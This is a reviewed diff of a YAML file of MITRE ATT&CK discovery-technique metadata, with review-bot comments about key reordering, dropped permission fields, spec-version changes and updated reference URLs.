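Review bot: almost all of this hunk is key reordering, not content: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and re-added at the end of the T1497 object in a later hunk. That makes the diff 40 removed lines for what is really a `modified` bump and a reference update. Emitting keys in a stable (for example sorted) order from the generator would keep future regenerations reviewable.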
@@ -50346,6 +51005,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -50356,8 +51019,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -50367,9 +51036,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
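Review bot: the Deloitte reference URL gains an `/edit` suffix (`.../1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`) and its retrieved date moves from May 18, 2021 to September 13, 2024; please confirm the `/edit` form of the Google Drive link resolves for an anonymous reader before shipping, since the old suffix-less link is what the 2021 retrieval was checked against. The rest of the `+` block is the re-emission of the keys removed from the top of T1497, plus the new `revoked: false`.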
@@ -50402,7 +51090,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50420,12 +51108,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50433,11 +51120,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
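Review bot: the new paragraph cites `(Citation: Permiso GUI-Vil 2023)`, and a reference with exactly that `source_name` is added to `external_references` in a later hunk, so the citation resolves. Note that `x_mitre_detection: ''` stays empty even though the added text (adversaries watching logs in real time to track incident response) is precisely the behaviour a detection note would cover; that gap is upstream, not introduced here, but worth a follow-up.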
@@ -50448,7 +51138,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50462,6 +51152,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50481,56 +51175,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -50552,19 +51201,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
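Review bot: unlike the other keys in this block, `x_mitre_permissions_required: [User]` is removed from T1087.004 and never re-added, so this is a real field drop (version 1.2 to 1.3), not a reorder. T1614.001 later in this diff keeps its `x_mitre_permissions_required: - User`, so consumers that read the field will see it on some objects and not others; confirm the drop is intentional upstream and mention it in the commit message. The `source_name: Google Cloud - IAM Servie Accounts List API` typo is a citation key and must stay as-is, since the description text references it verbatim.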
@@ -50635,46 +51326,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -50698,6 +51354,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -50708,9 +51367,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50720,12 +51384,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
@@ -50768,12 +51459,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -50784,28 +51474,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -50838,9 +51531,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -50883,7 +51575,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -50922,13 +51614,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
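Review bot: T1614.001 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` with no replacement `x_mitre_attack_spec_version` anywhere in its hunks, and its `modified` regresses to `2021-10-15T22:00:56.174Z`. Every other object in this diff keeps or bumps `x_mitre_attack_spec_version`, so after this change T1614.001 is the one entry without it; if the old `2.1.0` was a generator default for objects that predate the field, consumers need to tolerate its absence, and that should be stated rather than left implicit.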
@@ -50969,87 +51659,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:07:23.511Z'
+ name: System Location Discovery
+ description: |2-
+
+ Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+
+ Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
+
+ Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Pooja Natarajan, NEC Corporation India
- Hiroki Nagahama, NEC Corporation
- Manikantan Srinivasan, NEC Corporation India
- Wes Hurd
- Katie Nickels, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
+
+ Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
+
+ Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ - IaaS
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Process: OS API Execution'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--c877e33f-1df6-40d6-b1e7-ce70f16f4979
created: '2021-04-01T16:42:08.735Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1614
url: https://attack.mitre.org/techniques/T1614
- - source_name: FBI Ragnar Locker 2020
- url: https://assets.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
- description: FBI. (2020, November 19). Indicators of Compromise Associated
- with Ragnar Locker Ransomware. Retrieved April 1, 2021.
- - source_name: Sophos Geolocation 2016
- url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
- description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
- target you based on where you live. Retrieved April 1, 2021.'
+ external_id: T1614
- source_name: Bleepingcomputer RAT malware 2020
- url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
description: Abrams, L. (2020, October 23). New RAT malware gets commands
via Discord, has ransomware feature. Retrieved April 1, 2021.
+ url: https://www.bleepingcomputer.com/news/security/new-rat-malware-gets-commands-via-discord-has-ransomware-feature/
- source_name: AWS Instance Identity Documents
- url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
description: Amazon. (n.d.). Instance identity documents. Retrieved April
2, 2021.
- - source_name: Microsoft Azure Instance Metadata 2021
- url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
- description: Microsoft. (2021, February 21). Azure Instance Metadata Service
- (Windows). Retrieved April 2, 2021.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-identity-documents.html
- source_name: Securelist Trasparent Tribe 2020
- url: https://securelist.com/transparent-tribe-part-1/98127/
description: 'Dedola, G. (2020, August 20). Transparent Tribe: Evolution analysis,
part 1. Retrieved April 1, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: System Location Discovery
- description: |2-
-
- Adversaries may gather information in an attempt to calculate the geographical location of a victim host. Adversaries may use the information from [System Location Discovery](https://attack.mitre.org/techniques/T1614) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-
- Adversaries may attempt to infer the location of a system using various system checks, such as time zone, keyboard layout, and/or language settings.(Citation: FBI Ragnar Locker 2020)(Citation: Sophos Geolocation 2016)(Citation: Bleepingcomputer RAT malware 2020) Windows API functions such as GetLocaleInfoW
can also be used to determine the locale of the host.(Citation: FBI Ragnar Locker 2020) In cloud environments, an instance's availability zone may also be discovered by accessing the instance metadata service from the instance.(Citation: AWS Instance Identity Documents)(Citation: Microsoft Azure Instance Metadata 2021)
-
- Adversaries may also attempt to infer the location of a victim host using IP addressing, such as via online geolocation IP-lookup services.(Citation: Securelist Trasparent Tribe 2020)(Citation: Sophos Geolocation 2016)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_detection: |-
- System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
-
- Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling GetLocaleInfoW
to gather information.(Citation: FBI Ragnar Locker 2020)
-
- Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.
- x_mitre_version: '1.0'
+ url: https://securelist.com/transparent-tribe-part-1/98127/
+ - source_name: FBI Ragnar Locker 2020
+ description: FBI. (2020, November 19). Indicators of Compromise Associated
+ with Ragnar Locker Ransomware. Retrieved September 12, 2024.
+ url: https://s3.documentcloud.org/documents/20413525/fbi-flash-indicators-of-compromise-ragnar-locker-ransomware-11192020-bc.pdf
+ - source_name: Microsoft Azure Instance Metadata 2021
+ description: Microsoft. (2021, February 21). Azure Instance Metadata Service
+ (Windows). Retrieved April 2, 2021.
+ url: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=windows
+ - source_name: Sophos Geolocation 2016
+ description: 'Wisniewski, C. (2016, May 3). Location-based threats: How cybercriminals
+ target you based on where you live. Retrieved April 1, 2021.'
+ url: https://news.sophos.com/en-us/2016/05/03/location-based-ransomware-threat-research/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Process: OS API Execution'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614
atomic_tests: []
T1518.001:
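Review bot: `x_mitre_permissions_required: [User]` is removed from T1614 (the `-` lines just above `x_mitre_is_subtechnique`) with nothing replacing it, so any consumer of that field goes from `User` to absent; call this out in the PR description if it is an upstream removal. Separately, most of this hunk is the same keys re-emitted in a different order (description, kill_chain_phases, x_mitre_detection, the whole external_references list), which buries the real changes: `modified` 2022-04-25 to 2024-10-15, `x_mitre_version` 1.0 to 1.1, new `revoked: false` and `x_mitre_deprecated: false`, the FBI Ragnar Locker URL moving from `assets.documentcloud.org` to `s3.documentcloud.org` with a September 2024 retrieval date, and the spec version bump to 3.2.0. Emitting keys in a stable sorted order from the generator would keep future regenerations reviewable.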
@@ -51102,17 +51790,16 @@ discovery:
